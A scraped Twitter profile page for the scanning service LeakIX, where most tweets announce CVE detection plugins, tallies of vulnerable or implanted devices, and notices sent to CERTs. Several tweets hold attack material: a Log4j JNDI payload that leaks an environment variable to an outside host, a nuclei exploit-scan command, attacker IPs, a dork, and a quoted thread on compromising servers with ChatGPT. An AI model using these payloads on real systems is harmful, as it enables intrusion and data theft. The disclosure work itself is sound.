LeakIX
@leak_ix
Followers
4,744
Following
220
Media
266
Statuses
1,339
Maintaining and reporting for LeakIX.
Joined July 2020
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
الرائد
• 292734 Tweets
Marçal
• 161140 Tweets
Beyoncé
• 122572 Tweets
sabrina
• 111581 Tweets
Bush
• 99282 Tweets
Barron
• 95750 Tweets
Ann Coulter
• 91060 Tweets
#النصر_الرايد
• 88219 Tweets
Boulos
• 77366 Tweets
MUERO X DECÍRTELO OUT NOW
• 58291 Tweets
#DNCConvention2024
• 55031 Tweets
#كاريزما47
• 40181 Tweets
shawn
• 35913 Tweets
Ken Salazar
• 28143 Tweets
The Chicks
• 27320 Tweets
Mike Pence
• 26984 Tweets
#ShortNSweet
• 24045 Tweets
Dinesh
• 21537 Tweets
ラストマイル
• 20943 Tweets
Elizabeth Warren
• 19642 Tweets
Mundial de Clubes
• 17931 Tweets
対象の3作品
• 15770 Tweets
Belgrano
• 14533 Tweets
Calleri
• 14495 Tweets
甲子園決勝
• 14016 Tweets
Morumbi
• 11867 Tweets
Colts
• 11452 Tweets
VAMOS FLAMENGO
• 11160 Tweets
Izquierdo
• 10158 Tweets
Bobadilla
• 10141 Tweets
Pinned Tweet
🚨 Detection for Check Point Gateway's CVE-2024-24919 has been improved.
~8500 vulnerable gateway found.
Hosting providers & CERTs have been notified, patch now!
Credits:
@watchtowrcyber
Thanks:
@Gi7w0rm
@Chocapikk_
🚨 New plugin for Check Point Gateway indexing hosts vulnerable to CVE-2024-24919.
~2400 vulnerable hosts found.
Hosting providers & CERTs have been notified, patch now!
Credits:
@watchtowrcyber
0
3
8
3
11
18
🚨🚨🚨 Whatever you were thinking about CVE-2023-20198 (
#Cisco
IOS EX) it's 100x worst.
We used
@TalosSecurity
IOC check and found ~30k implants.
That's 30k devices infected (routers, switches, VPNs), under the control of threat actors.
That's excluding rebooted devices.
17
167
443
🚨 Cisco Implant traffic detected from 192.3.101[.]111 .
Looking for DNS settings, likely to ID targets.
6
73
281
⚠️ Cisco exploit attempts from 38.60.199.10
404 because device is already implanted. it secures the devices against further exploitation.
Assuming it might be a new actor since they didn't try to use the implant authentication.
cc
@SI_FalconTeam
@Horizon3Attack
1
30
87
Still 25000 DVR solutions running that vulnerable firmware ... LFI for sure, RCE most likely ...
Source :
3
20
72
🚨 Watching out for IIS vulnerabilities:
Vector: Remote
Privileges required: None
Of course it would includes Exchange and so on ...
1
18
67
That's just awesome work! Glad we could help and thanks for sharing!
🧵THREAD🧵
How I compromised some servers and downloaded source codes of a company at
@Hacker0x01
private program using
@leak_ix
and
@OpenAI
ChatGPT
15
114
477
1
8
60
We now have a plugin for loading and running basic Nuclei's template files !
Don't forget to check out
@pdiscoveryio
tool and its awesome template community !
2
14
60
Releasing MobileIron Sentry (CVE-2023-38035) information disclosure exploit:
Source:
@Horizon3Attack
-
0
12
49
🔎 In the last episode of the
#IOS
XE exploit research saga, we find out how they replaced Nginx config files.
CVE-2023-20273: IOS XE root privilege escalation and implant installation.
3
20
49
Just out, we added a new API endpoint to help enumerate subdomains for a given domain :
1
16
47
📖 Recon tip time :
When looking for information on an IP or network, you might often get more detailed and structured information from RDAP instead of WHOIS.
Eg:
0
9
47
🚨 CVE-2023-22515 - Plugin released for
#Confluence
0day.
Found ~700 vulnerable public instances.
⚠️ There are also ~3500 instances still vulnerable to CVE-2022-26134 due to a wider range of versions affected.
Patch now!
Thanks
@Gi7w0rm
for the ping
0
11
42
🚨🚨🚨 Things are NOT getting better.
Today's scan revealed an additional 10k compromised devices, indicating exploitation is still ongoing.
This brings the number of implanted
#Cisco
IOS EX devices to ~37k .
Pretty much feels like Thanos could snap his fingers at any time.
🚨🚨🚨 Whatever you were thinking about CVE-2023-20198 (
#Cisco
IOS EX) it's 100x worst.
We used
@TalosSecurity
IOC check and found ~30k implants.
That's 30k devices infected (routers, switches, VPNs), under the control of threat actors.
That's excluding rebooted devices.
17
167
443
2
11
40
⚠️Well ... Our Grafana plugin sure becomes handy all of a sudden ...
->
New - Grafana unauthorized arbitrary file read
Template: by z0ne, dhiyaneshDk
Reference:
#bugbounty
#pentest
#appsec
2
181
559
0
9
30
⚠️ New plugin released for finding vulnerable Citrix ADC.
~16k found, ~50% have been patched.
Cloud images are a mess and some customers currently cannot update because Citrix only updated the BYOL versions.
Hosting providers and national CERTs have been notified.
0
7
32
🚨 CVE-2023-42793 - New plugin released for
#TeamCity
authentication bypass.
Found ~950 vulnerable public instances.
Patch now! The vulnerability allows for full take-over of the server and code execution.
Credits:
@SonarSource
1
12
30
As usual we went the extra step to scan for CVE-2023-27532 (
#Veeam
).
We believe that the vulnerability could also be exploited to achieve RCE (BinaryFormatter).
Every hosting provider and national CERTs is currently being sent the list of vulnerable assets in their scope.
1
6
27
🚨 CVE-2023-40044 - New plugin released for
#WSFTP
RCE.
Found ~250 vulnerable public instances. Patch now!
Alerts have been dispatched to CERTs and hosting providers.
Credits:
@assetnote
@MCKSysAr
Thanks:
@Gi7w0rm
1
15
28
🚨 New plugin for SysAid On-Prem indexing hosts vulnerable to CVE-2023-47246.
163 hosts found running a version older than 23.3.36
Hosting providers & CERTs have been notified.
Patch now!
1
12
26
🔍 Added IOS XE implant V3 detection on the platform.
Here's the current distribution of implant versions per country.
0
7
27
🚨 CVE-2023-39143 - New plugin released for finding vulnerable PaperCut instances.
~1.7k found, ~15% have been patched.
Hosting providers and national CERTs have been notified.
Source:
@Horizon3Attack
-
0
8
23
We analyzed CVE-2023-34039 - VMWare Aria Operations SSH auth bypass :
- Auth is possible with a fixed private key
- Key is version dependent
- Host key is the same for ALL version
Host key :
SHA256:tpcfUoQB+n2Wf6tDNm/YPA7DSwwzFjx3B7cnRC2apZ0
Credit
@rootxharsh
@iamnoooob
1/2
1
3
23
⚠️ Citrix has taken drastic measures to secure its ADC products.
From now on the `Last-Modified` headers of public web files are updated every restart.
🤡
7
10
21
Done with the Log4j plugin. Our method ensures we're tracking the source server we made the request to.
This means a 404 on a random server, can trigger a reply from a logging server in Amazon.
ping
@CristiVlad25
Available to trusted users only.
0
1
23
Our log4j scanner is now open source at
- Integrates LDAP server
- Suports template
- Trace back source and field responsible for pings
1
8
23
⚠️⚠️ [PROBLEMTYPE] in [PRODUCT] is quite a [SEVERITY] issue.
We found [EVENTCOUNT] services affected.
Everybody was sent no alerts whatsoever.
CVE-2023-38363 [PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR]
9
39
145
2
0
21
Our technical overview of what happened with the China Leak
Default Cloud Security settings must not be trusted
0
6
19
In 2021, you opened 573 reports, fixed 135, most of them critical!
Thanks to all our researchers, thanks for trusting us, let's make 2022 the year we prove there's a place for un-scoped research !
Special thanks to
@HaboubiAnis
@CristiVlad25
@dwillems42
0
2
19
🚨 CVE-2023-29357 - New plugin released for
#SharePoint
2019 authentication bypass.
Found ~200 vulnerable public instances.
The vulnerability allows for full take-over, document exfiltration and more.
Credits:
@starlabs_sg
,
@Chocapikk_
Thanks:
@Gi7w0rm
0
7
20
Working on a new project 😶
hxxp://157.230.104.109/ -> infected files and powershell cc
@vxunderground
3
1
20
@_StaticFlow_
Use ${jndi:ldaps://${env:user}.xyz.collab.com/a} and get direct connections with the hostname inside the TLS handshake you just initiated.
0
4
18
⚠️ 5 days ago
@CISA
added CVE-2023-27532, to their known exploited vulnerabilities list.
It impacts Veeam and can lead to full infrastructure compromise including backups and server credentials.
There are still ~200 vulnerable instances currently online, 90% have been patched.
0
7
19
Suspect activity since September 2022:
More than 4M free domain names have been registered and are displaying single page content related to FUDing BTC, social networks and sexual orientation.
Impacted domains : ga, tk, cf
3
1
18
It has been brought to our attention that the product name is IOS XE and not IOS EX.
It's really too bad because the filenames were pretty sexy to work with 🤷
( It's been a long night )
1
1
18
Yes, Kafka servers are also left open without authentication. And it's as bad as open databases :
0
2
15
We built LeakIX on personal money with a severance package received from COVID, already sending free alerts to CERTs.
We refused external interference, multiple times, losing money and eating junk for 6 months.
@dwillems42
then joined and we started profiting.
1/2
1st: Fuck every single people giving even just $1 to Cyble.
2nd: Fuck
@TechCrunch
for writing an article about that & saying not a single word about what kind of piece of shit company Cyble is.
3rd: fuck Cyble, as usual.
😫😫😫
cc
@idclickthat
@Iamdeadlyz
@ULTRAFRAUD
@JAMESWT_MHT
5
4
35
1
2
14
Huge shout out to
@Chocapikk_
,
@CristiVlad25
and
@Gi7w0rm
.
Over 1 week they have identified and sent personalized reports to a 105 companies and institutions on
#MobileIron
,
#SharePoint
,
#Metabase
and
#Citrix
ADC.
You guys are awesome and we're honored to have you on board !
2
0
14
🔍Some light on the vulnerability:
- ~6000 VCD found
- Any password will allow authentication as root
- The appliance management web interface is exposed on ~22 hosts
- SSH is enabled on ~84 hosts, we weren't able to bypass auth on those.
In total 6 hosts were found vulnerable.
0
3
14
Today we are free from control, we don't have anyone to report to and look good to, except the community.
Our values will always stay the same.
The junk eating too.
0
0
14
Totally agree, it was awesome to be in a conf about real tech that wasn't business oriented ❤️. Thanks for having us! We're definitely convinced to start contributing to
@MISPProject
!
Thank you
@MISPProject
and
@circl_lu
for organising the
#CTISummit
#CTIS2022
conference. Interesting talks and meeting a lot of nice people. I enjoyed the new format a lot!
0
5
22
0
3
14
It's the most difficult part about off-scope bug hunting, and trust us, it breaks our hearts to see good deeds being ignored.
Thousands of easy high-value targets are found every day, we're not doing rocket-science here. 1/3
3
4
14
🚨CVE-2023-34124 ( and friends ) - New plugin released for finding vulnerable
#SonicWall
GMS instances.
Found ~100 vulnerable public instances.
Hosting providers and national CERTs have been notified.
Sources:
@rapid7
-
Thanks:
@Gi7w0rm
0
5
13
If you're looking for hosting in Europe > go
@Hetzner_Online
those guys are just wonderful. 💕
3
1
13
Microsoft patches of interest:
- MSMQ is back (RCE): CVE-2023-32057, CVE-2023-32045, CVE-2023-32044, CVE-2023-35309
- SharePoint (RCE): CVE-2023-33134, CVE-2023-33157, CVE-2023-33159, CVE-2023-33160, CVE-2023-33165
- RRAS (RCE): CVE-2023-35366, CVE-2023-35367
0
4
13
⚠️ Remember Zimbra's CVE-2022-27925 ?
We have indicators showing threat actors are using the vulnerability to access user mailboxes.
They are then sending various scams to every email they can find in the system.
0
5
13
🚨 New plugin in town, we added detection for
#SharePoint
2019 versions covering :
CVE-2023-33134 CVE-2023-33157 CVE-2023-33159 CVE-2023-33160 CVE-2023-33165.
Alerts have been sent to participating CERTs and network providers.
0
3
11
Tagged all the confluence server >= 7.4
Results are now public here :
0
4
11
🚨 CVE-2023-35885 - New plugin released for finding vulnerable CloudPanel instances.
~57k found, ~70% have been patched.
Hosting providers and national CERTs have been notified.
Source :
0
6
12
Ivanti Endpoint Manager Mobile - CVE-2023-35078 exploit is now public.
Scan for Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass (CVE-2023-35078) using nuclei templates.
Nuclei Template -
CISA Advisory -
nuclei -id CVE-2023-35078 -list urls
1
69
245
0
4
12
Don't want to start Friday lost in results pages ?
Go explore Internet in our graph explorer !
👉
📘
Delivered on schedule, preview free for everyone !
1
3
12
Upcoming change:
Starting tomorrow our API will be available to authenticated users only.
Update your tooling !
0
2
11
@Nevermore_cyber
@TalosSecurity
That's 30k confirmed as compromised.
Talos has a detailed post on how the implant works :
1
1
11
🚨 CVE-2023-39848 - This is no laughing matter and should be taken seriously.
~999,999,999 found, 0% patched as the vendor is not releasing a new version and merely suggests a̵n̵ ̵R̵P̵M̵ ̵f̵i̵x̵. nothing.
Secret services have been notified.
🙅Rejected🙅♂️ CVE-2023-39848 Feel free to laugh out loud 🤣🤣🤣, unless your instances are exposed 👀
🧷
Dork 👇👇👇
"Damn Vulnerable Web Application (DVWA)"
#infosec
#infosys
#BugBounty
2
6
9
2
6
11
After the brilliant talk by
@PatriceAuffret
from
@Onyphe
at CTI-Summit, we decided to join the movement and follow the 10 Commandments for Ethical Internet Scanning.
More info on our probe network at
0
2
11
@ACEResponder
Always use io.LimitReader on untrusted inputs, apply proper ctx and tcp deadlines.
0
0
11
Starting today we are changing our scanning methodology.
Vulnerabilities will be re-scanned every day to avoid confusion on older results.
Our plans will be adapted next month to allow searching on older/patched vulnerabilities.
Current subscriptions will not be affected.
0
1
11
🤷Ivanti MobileIron Core strikes back :
CVE-2023-35081 - Remote Arbitrary File Write
We are seeing 3 new version being deployed :
11.10.0.3, 11.9.1.2 and 11.8.1.2
1
3
10
Do you need to integrate our platform in your own solution ?
The hook documentation is out !
0
0
8
🚨 New plugin for Apache ActiveMQ is up!
Still ~2900 vulnerable instances running on standard ports.
CVE-2023-46604 is currently exploited in the wild.
We are scanning & reporting out Apache ActiveMQ instances vulnerable to CVE-2023-46604, a deserialization of untrusted data RCE. 3329 vulnerable brokers found out of 7249 accessible (2023-10-30).
Data in new daily Accessible ActiveMQ Service report:
1
4
6
1
2
10
📖Learn more about the l9 tool suite at
0
3
10
🙏 Another appliance saved from disaster. Feels good to read positive feedback from our prevention program. We'll always do our part and keep network admins in the loop for free about critical issues.
0
1
10
If you are a pro user and use the bulk export, you can now use the Python client to do the same. We have just released a new version of the client, `0.1.8`. See .
It also includes some fixes in the library l9format, making some fields optional.
Enjoy!
2
3
10
As requested by our community, we just updated our python client documentation: . Please let us know if you need any help to use it, wants to see new features or tools.
#leakix
#redteam
#OSINT
#Pentesting
#CyberSecurity
#infosec
#BugBounty
0
2
10
New POC project 🤔
What's your general experience with other Wordpress scanning projects ?
2
1
9
Did any honeypot folks catch this ? cc
@SI_FalconTeam
@r4shimo
🚨BREAKING🚨
#Cisco
#CVE_2023_20198
implants version 2 have disappeared.
We went down from ~31K implanted devices to 400 devicesin less that 24 hours.
0
12
22
2
4
10
There's an AI out there faking HTTP responses depending on the URL you query 🤣
2
1
9
⚠️ CVE-2023-35082 - Only ~200 patched since.
Ivanti communication has been confusing:
- No new version has been released to address the updated issue
- People are assuming they're running the last version
- No new CVE was issued for a different vulnerability
1
5
9
We've tried to get further on this.
If anyone ( any country ) has deployed the application from it's offical docker image, the endpoint for issuing CERTs was exposed without authentication.
[THREAD] One of the (main?) reasons why we keep seeing exposed services, like the DGCI web frontend which led to the whole mess we witnessed today, is because people just trust Docker Compose files and don't understand the simplest of all options: port forwarding. [1/N]
2
11
39
0
4
9
New design is out! Time to embrace our cyber-punk side and bring some colors into life!
1
1
8
📖 You have all been asking for it! The documentation is finally here! Including query syntax, all the fields and a dork library.
👉
0
2
8
